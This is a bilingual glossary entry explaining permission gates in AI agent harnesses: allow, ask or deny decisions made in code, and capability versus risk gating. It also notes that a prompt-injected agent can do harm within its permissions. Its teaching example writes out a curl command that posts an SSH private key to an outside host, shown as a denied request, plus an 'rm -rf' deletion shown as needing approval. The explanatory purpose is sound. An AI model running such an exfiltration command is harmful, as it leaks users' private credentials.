Agentic Research

Permission gate

Also: 權限閘門 · 權限關卡 · permission gate · 授權檢查

The decision point before an action runs: allow, ask a human, or deny — enforced by harness code, not left to the model's goodwill.

When you will meet it

From the moment you give an agent its first world-changing tool, every defence line eventually lands on some gate. But know its boundary: a gate rules on whether an action may happen; prompt injection changes what the agent wants to happen — and an injected agent will dutifully do damage within its permissions. Gates cannot replace input defence and input defence cannot replace gates: one limits capability, the other contests intent, and the wall falls without either.

An analogy

Like badge access plus purchase approval: the badge decides which floors you can reach (capability); the sign-off decides whether this spend may happen (risk). One card that opens every floor and self-approves purchases is the shape of a disaster — however honest the holder has been so far.

Minimal example

同一個 Agent 的四個工具請求,三種閘門決定(示意):

  read_file("src/app.ts")
    → ALLOW:唯讀,且在工作區內

  write_file("src/app.ts")
    → ALLOW:可寫,但範圍限 workspace 之內

  bash("curl -X POST ... -d @~/.ssh/id_rsa")
    → DENY:讀敏感路徑+資料出網,命中規則直接擋

  bash("rm -rf ./build")
    → ASK:可逆性存疑,彈出去問人

兩種閘門維度:
  能力閘:這個工具/路徑/網路目標,原則上開不開放
  風險閘:這一次具體參數的代價與可逆性,要不要升級成問人

Note capability gates versus risk gates: grading by capability alone (ask for every bash) treats high- and low-stakes actions alike and fatigues users fast; grading by risk alone makes rules too baroque to maintain. Practice stacks both: capability sets the default, risk decides per-call escalation.

What people get wrong

  • Implementing gates in the prompt ("please do not delete files without asking"). A prompt is advice, not control: the model may ignore it, or be injected into agreeing. A real gate is code — the if-statement before tool execution, which no model output can talk past.
  • Substituting maximum strictness for grading. If every action needs human approval, you train users to click yes blindly — the genuinely dangerous one slips through among a hundred harmless approvals, and the gate exists in name only.

Related terms

Next